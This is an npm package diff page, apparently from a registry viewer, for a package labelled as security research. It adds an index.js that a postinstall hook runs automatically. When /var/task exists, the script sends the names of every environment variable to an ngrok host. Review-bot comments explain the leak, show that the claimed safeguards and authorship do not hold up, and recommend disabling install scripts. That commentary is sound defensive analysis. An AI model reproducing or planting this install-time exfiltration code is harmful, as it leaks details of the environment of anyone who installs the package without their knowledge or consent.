dogwhohacks-research-security-do-not-install 1.0.7


Potentially problematic release.


This version of dogwhohacks-research-security-do-not-install might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +5 -0
  2. package/index.js +27 -0
  3. package/package.json +12 -0
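--- a/package/README.md
+++ b/package/README.md
@@ -0,0 +1,5 @@
+Security Research for @rhyselsmore. Testing a consumer of NPM - which I have permission to test.
+
+Despite safeguards in place to ensure this only runs on the targetted host, please do not install this.
+
+Email me@rhys.io with queries.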
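--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,27 @@
+const https = require('node:https');
+const fs = require('fs');
+
+if (!fs.existsSync("/var/task")) {
+process.exit(0)
+}
+
+const options = {
+hostname: '0cba25ed7862.au.ngrok.io',
+port: 443,
+path: '/container-ping?q=' + Object.keys(process.env).join(","),
+method: 'GET'
+};
+
+const req = https.request(options, (res) => {
+console.log('statusCode:', res.statusCode);
+console.log('headers:', res.headers);
+
+res.on('data', (d) => {
+process.stdout.write(d);
+});
+});
+
+req.on('error', (e) => {
+console.error(e);
+});
+req.end();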
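Review bot: The only gate before the outbound request is `fs.existsSync("/var/task")`, which passes on any host that has that directory (it is commonly present in AWS Lambda-style runtimes) rather than on one identified target, so the README's claim of host-specific safeguards is not backed by this file. When the check passes, `Object.keys(process.env).join(",")` puts the name of every environment variable into the query string of a GET to `0cba25ed7862.au.ngrok.io`; values are not sent, but key names alone disclose which services and secrets the environment is wired to, and query strings tend to be retained in proxy and tunnel logs. Anyone who finds this package in a dependency tree should treat those variable names as disclosed and search DNS and egress logs from install time for that hostname. At minimum the file should state what it collects, for example a header comment such as `// Sends the NAMES (not values) of all environment variables to an external host when /var/task exists`.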
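--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,12 @@
+{
+"name": "dogwhohacks-research-security-do-not-install",
+"version": "1.0.7",
+"description": "Security Research for @dogwhohacks on Bugcrowd. Do not install",
+"main": "index.js",
+"scripts": {
+"test": "echo \"Error: no test specified\" && exit 1",
+"postinstall": "node index.js"
+},
+"author": "",
+"license": "ISC"
+}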
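Review bot: `"postinstall": "node index.js"` runs index.js automatically during `npm install`, with the installing user's privileges and environment, before any code ever imports the package, so pulling this in as a direct or transitive dependency is enough to trigger it. Installing with `npm install --ignore-scripts`, or setting `ignore-scripts=true` in `.npmrc` for CI and build hosts, stops lifecycle hooks like this from executing. The authorization claim also cannot be checked from the package itself: `"author"` is empty, and the description attributes the work to @dogwhohacks on Bugcrowd while the README names @rhyselsmore, so consumers should not rely on the "research" label when deciding how to respond.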